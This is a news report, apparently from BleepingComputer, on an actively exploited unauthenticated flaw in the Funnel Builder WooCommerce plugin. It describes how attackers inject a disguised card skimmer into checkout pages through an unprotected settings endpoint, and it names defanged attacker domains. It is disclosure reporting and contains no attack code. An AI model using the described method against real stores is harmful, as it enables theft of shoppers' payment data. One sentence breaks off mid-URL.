A serious vulnerability in the WordPress Funnel Builder plugin is currently being exploited in the wild to inject malicious JavaScript into WooCommerce checkout pages. The flaw lacks an official CVE ID and can be exploited without authentication. It impacts all versions of the plugin prior to 3.15. **Funnel Builder** is a WordPress plugin for WooCommerce created by FunnelKit. It is mainly used to customize checkout pages and includes powerful features such as one-click upsells, dedicated landing pages, and tools to improve conversion rates. (Statistics sourced from WordPress.org) According to reports, the Funnel Builder plugin is active on over 40,000 websites. E-commerce security firm Sansec identified the malicious activity and observed that the payload was being served from analytics-reports[.]com/wss/jquery-lib. The JavaScript is disguised as a fake Google Tag Manager or Google Analytics script and opens a WebSocket connection to an external server (wss://protect-wss[.] An attacker can exploit this by modifying the plugin’s global settings through an unprotected, publicly accessible checkout endpoint. This enables the injection of arbitrary JavaScript into the plugin’s “External Scripts” setting, which then causes malicious code to run on every checkout page. According to Sansec, the attacker-controlled server serves a tailored payment card skimmer that exfiltrates the following data: Credit card details. CVV codes.
BleepingComputer